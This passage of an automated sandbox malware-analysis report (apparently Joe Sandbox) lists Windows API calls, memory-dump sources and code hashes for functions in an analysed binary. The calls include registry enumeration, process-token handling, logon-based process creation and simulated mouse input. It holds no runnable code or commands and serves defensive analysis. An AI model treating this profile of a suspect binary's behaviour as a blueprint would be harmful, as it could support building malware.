                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00EF4282,?), ref: 00EF41D3
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00EF41DA
                                                                  • EncodePointer.KERNEL32(00000000), ref: 00EF41E6
                                                                  • DecodePointer.KERNEL32(00000001,00EF4282,?), ref: 00EF4203
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                  • String ID: RoInitialize$combase.dll
                                                                  • API String ID: 3489934621-340411864
                                                                  • Opcode ID: 336e4d41d8e1bb94524ece9d18e0bb421a159d2641152125d3497664791ca94c
                                                                  • Instruction ID: 50238e829bcd0e4a940e91508c14c183722e54b87f47da2791cc9a08ab041988
                                                                  • Opcode Fuzzy Hash: 336e4d41d8e1bb94524ece9d18e0bb421a159d2641152125d3497664791ca94c
                                                                  • Instruction Fuzzy Hash: F2E01AB069070DAFEB111B70ED4DB1A3664AB11B0AF604426F511E51E0CFF54088BF00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EF41A8), ref: 00EF42A8
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00EF42AF
                                                                  • EncodePointer.KERNEL32(00000000), ref: 00EF42BA
                                                                  • DecodePointer.KERNEL32(00EF41A8), ref: 00EF42D5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                  • String ID: RoUninitialize$combase.dll
                                                                  • API String ID: 3489934621-2819208100
                                                                  • Opcode ID: 73eaca5575913ef8fe408b7704dbb994b841878146ad4b0e4b3c83fb48f906d6
                                                                  • Instruction ID: e145ea587955159b46d8667b528d1e6f82f69dc79523da20d6714441007e8d8c
                                                                  • Opcode Fuzzy Hash: 73eaca5575913ef8fe408b7704dbb994b841878146ad4b0e4b3c83fb48f906d6
                                                                  • Instruction Fuzzy Hash: 56E0B6B055071CABEB129F60AD0DB563AA4BB01B46F600126F115E51F0CFF48688FB15
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$Window$Screen
                                                                  • String ID:
                                                                  • API String ID: 1296646539-0
                                                                  • Opcode ID: 3179be26da650cb198569c5c4a03af53a6bcd602ae715f6371622d14159511a1
                                                                  • Instruction ID: 66a33e897cf166a1db550e82482667c0a7bd25d933765eb6ce953ededf472080
                                                                  • Opcode Fuzzy Hash: 3179be26da650cb198569c5c4a03af53a6bcd602ae715f6371622d14159511a1
                                                                  • Instruction Fuzzy Hash: CEB17D3990024ADBDF10CFA8C5807EEB7B1FF18710F14912AEE59AB354DB34A951EB64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 3253778849-0
                                                                  • Opcode ID: 93a6fe222215f152f2da7da047a9d34a8d19e8cc4c7108f3cd93bca79a4447a6
                                                                  • Instruction ID: a8e0a62e7fc4860edbd1d638950de92f02f6abfdddeeedb537c73ceb4889378c
                                                                  • Opcode Fuzzy Hash: 93a6fe222215f152f2da7da047a9d34a8d19e8cc4c7108f3cd93bca79a4447a6
                                                                  • Instruction Fuzzy Hash: 2361EE7150029EABCF01EF60CC82EFE37A9EF05318F049599F959AB292DB349C46DB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77
                                                                    • Part of subcall function 00F5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5040D,?,?), ref: 00F51491
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F5091D
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F5095D
                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F50980
                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F509A9
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F509EC
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00F509F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                  • String ID:
                                                                  • API String ID: 4046560759-0
                                                                  • Opcode ID: d862686ffcdab6672d64d1749eb864683c48e500a90a83eec0ad754996280130
                                                                  • Instruction ID: 999257fa3c2bf2bcb2ca6e7d94b99490fe0a6a2696aa9cf9b8f9c158d3601d30
                                                                  • Opcode Fuzzy Hash: d862686ffcdab6672d64d1749eb864683c48e500a90a83eec0ad754996280130
                                                                  • Instruction Fuzzy Hash: 94519C31208244AFD714EF64C885E6FBBE9FF84310F10491DF995972A2DB31E909EB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountMessagePostString
                                                                  • String ID:
                                                                  • API String ID: 650687236-0
                                                                  • Opcode ID: 747d07ab05bb0e11d0ccdc745f9c02dba1860a8febdb90ed2ab4017c8d6bec68
                                                                  • Instruction ID: 74fc118b7e2c632b9c86e4bc818eb9f7b3a9201cdbe81ea9b9c64fbc08812575
                                                                  • Opcode Fuzzy Hash: 747d07ab05bb0e11d0ccdc745f9c02dba1860a8febdb90ed2ab4017c8d6bec68
                                                                  • Instruction Fuzzy Hash: 2451BE36E00A19EFCB11EF64C851AAEB7F5EF48720F104059EE11BB391CB74AE419B90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 00F2F6A2
                                                                  • VariantClear.OLEAUT32(00000013), ref: 00F2F714
                                                                  • VariantClear.OLEAUT32(00000000), ref: 00F2F76F
                                                                  • _memmove.LIBCMT ref: 00F2F799
                                                                  • VariantClear.OLEAUT32(?), ref: 00F2F7E6
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F2F814
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                  • String ID:
                                                                  • API String ID: 1101466143-0
                                                                  • Opcode ID: 51655ac226ae314ae99fc33921ea11c7976c9dd466d88db7bbda82565737a31a
                                                                  • Instruction ID: 80b6e26d1300e4c368e8ebc52591e520dc090b2f7c6e7fb59c005322d489a5bc
                                                                  • Opcode Fuzzy Hash: 51655ac226ae314ae99fc33921ea11c7976c9dd466d88db7bbda82565737a31a
                                                                  • Instruction Fuzzy Hash: 8B5168B5A10219EFCB14CF58D884AAAB7B8FF4C314B15856AE959DB300D734E915CFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00F329FF
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F32A4A
                                                                  • IsMenu.USER32 ref: 00F32A6A
                                                                  • CreatePopupMenu.USER32(00F97890,00000000,749133D0), ref: 00F32A9E
                                                                  • GetMenuItemCount.USER32 ref: 00F32AFC
                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F32B2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                  • String ID:
                                                                  • API String ID: 3311875123-0
                                                                  • Opcode ID: 4a9981143becaf9f0a71e60352924843c4e2b28995acaa237b325458339d6fae
                                                                  • Instruction ID: dce88218943eff187e8e881afb64d044066fb1080858c356b25cabe0634d3b3f
                                                                  • Opcode Fuzzy Hash: 4a9981143becaf9f0a71e60352924843c4e2b28995acaa237b325458339d6fae
                                                                  • Instruction Fuzzy Hash: 4751BF70A00309EFDF65CF68D888BAEFBF4AF84334F144159E8119B2A1DBB49944EB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3
                                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00ED1B76
                                                                  • GetWindowRect.USER32 ref: 00ED1BDA
                                                                  • ScreenToClient.USER32 ref: 00ED1BF7
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00ED1C08
                                                                  • EndPaint.USER32(?,?), ref: 00ED1C52
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                  • String ID:
                                                                  • API String ID: 1827037458-0
                                                                  • Opcode ID: 6ca9f57db81f4e9fe96d5e60ff038eb72bf9ecbadbb3ce98da4840ceace9cb6c
                                                                  • Instruction ID: d9fba3e5d0af737a816e41ef606cc077165d786c2402b3108e907d8b45b68a56
                                                                  • Opcode Fuzzy Hash: 6ca9f57db81f4e9fe96d5e60ff038eb72bf9ecbadbb3ce98da4840ceace9cb6c
                                                                  • Instruction Fuzzy Hash: 9E41E470104305AFD710EF24CC88FBB7BE8EB85364F2405AAF9A5972A1C7719846EB61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ShowWindow.USER32(00F977B0,00000000,012786F8,?,?,00F977B0,?,00F5BC1A,?,?), ref: 00F5BD84
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00F5BDA8
                                                                  • ShowWindow.USER32(00F977B0,00000000,012786F8,?,?,00F977B0,?,00F5BC1A,?,?), ref: 00F5BE08
                                                                  • ShowWindow.USER32(00000000,00000004,?,00F5BC1A,?,?), ref: 00F5BE1A
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 00F5BE3E
                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F5BE61
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: 4555a7c28c95501588e273dffa22771c4e97e55718c929d319f71b505cece069
                                                                  • Instruction ID: 1e5f67ff27a88913c5a9ccb28b051ef263c4affd81c211a44fa4450ac518c514
                                                                  • Opcode Fuzzy Hash: 4555a7c28c95501588e273dffa22771c4e97e55718c929d319f71b505cece069
                                                                  • Instruction Fuzzy Hash: 49415334A00545AFDB22CF14C48AB957BF1FF05326F1841A9EF588F2A2CB71A859EB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00F4550C,?,?,00000000,00000001), ref: 00F47796
                                                                    • Part of subcall function 00F4406C: GetWindowRect.USER32 ref: 00F4407F
                                                                  • GetDesktopWindow.USER32 ref: 00F477C0
                                                                  • GetWindowRect.USER32 ref: 00F477C7
                                                                  • mouse_event.USER32 ref: 00F477F9
                                                                    • Part of subcall function 00F357FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F35877
                                                                  • GetCursorPos.USER32(?,?,?,?,?,?,00F4550C,?,?,00000000,00000001), ref: 00F47825
                                                                  • mouse_event.USER32 ref: 00F47883
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                  • String ID:
                                                                  • API String ID: 4137160315-0
                                                                  • Opcode ID: 487796da67e49cd161ce24da0bbaa2208ac3056c391ce455b7d844205817438c
                                                                  • Instruction ID: 1e8bc8c365f3c96648d6513bb24380106e09ff2d1b9ec21c29156f7861617d0c
                                                                  • Opcode Fuzzy Hash: 487796da67e49cd161ce24da0bbaa2208ac3056c391ce455b7d844205817438c
                                                                  • Instruction Fuzzy Hash: 6F31D272508309ABD720DF14CC49F9BBBA9FF88714F100919F995A7181CB75E908DB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F28CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F28CDE
                                                                    • Part of subcall function 00F28CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F28CE8
                                                                    • Part of subcall function 00F28CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F28CF7
                                                                    • Part of subcall function 00F28CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F28CFE
                                                                    • Part of subcall function 00F28CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F28D14
                                                                  • GetLengthSid.ADVAPI32(?,00000000,00F2904D), ref: 00F29482
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F2948E
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00F29495
                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F294AE
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00F2904D), ref: 00F294C2
                                                                  • HeapFree.KERNEL32(00000000), ref: 00F294C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                  • String ID:
                                                                  • API String ID: 3008561057-0
                                                                  • Opcode ID: 9a5e837283aadadb0e449318fce869c216d20d6b62ac982fa56b2eba38ea1d9a
                                                                  • Instruction ID: 6d2b6b3c391deab98dd6cbf997d63b4701128dfa8dc7c7ac56e70988ecd9333e
                                                                  • Opcode Fuzzy Hash: 9a5e837283aadadb0e449318fce869c216d20d6b62ac982fa56b2eba38ea1d9a
                                                                  • Instruction Fuzzy Hash: C111B431905618FFDB10EFA4DC19BAF77A9FB45325F108119E85597210CBB59901EB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F29200
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00F29207
                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F29216
                                                                  • CloseHandle.KERNEL32(00000004), ref: 00F29221
                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F29250
                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F29264
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                  • String ID:
                                                                  • API String ID: 1413079979-0
                                                                  • Opcode ID: d5137395493b446b8574237b53fe659c64355334eeb11f60328b175300013472
                                                                  • Instruction ID: ce41c577f78ab129bb86fd611e78fa34cbb04bd1a182b3db2f7dae551cbd683a
                                                                  • Opcode Fuzzy Hash: d5137395493b446b8574237b53fe659c64355334eeb11f60328b175300013472
                                                                  • Instruction Fuzzy Hash: DA11477250520EFBDB028F94ED49BDA7BA9EF08714F144024FA04A2160C7B29D60EB60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 00F2C34E
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F2C35F
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F2C366
                                                                  • ReleaseDC.USER32 ref: 00F2C36E
                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F2C385
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00F2C397
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Release
                                                                  • String ID:
                                                                  • API String ID: 1035833867-0
                                                                  • Opcode ID: 7ad9b09fd1bed00a29f303b84508c48cf1050e72151cd58e4dde04504ee991a5
                                                                  • Instruction ID: ded8d97cd406b048148c739810090837571d2b31427f0fe3e665ccd33ed450ff
                                                                  • Opcode Fuzzy Hash: 7ad9b09fd1bed00a29f303b84508c48cf1050e72151cd58e4dde04504ee991a5
                                                                  • Instruction Fuzzy Hash: 99014475E00319BBEF109BA59D49A5FBFB8EB48761F104065FA08A7290DAB19D10DFA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED1729
                                                                    • Part of subcall function 00ED16CF: SelectObject.GDI32(?,00000000), ref: 00ED1738
                                                                    • Part of subcall function 00ED16CF: BeginPath.GDI32(?), ref: 00ED174F
                                                                    • Part of subcall function 00ED16CF: SelectObject.GDI32(?,00000000), ref: 00ED1778
                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F5C57C
                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 00F5C590
                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F5C59E
                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 00F5C5AE
                                                                  • EndPath.GDI32(00000000), ref: 00F5C5BE
                                                                  • StrokePath.GDI32(00000000), ref: 00F5C5CE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                  • String ID:
                                                                  • API String ID: 43455801-0
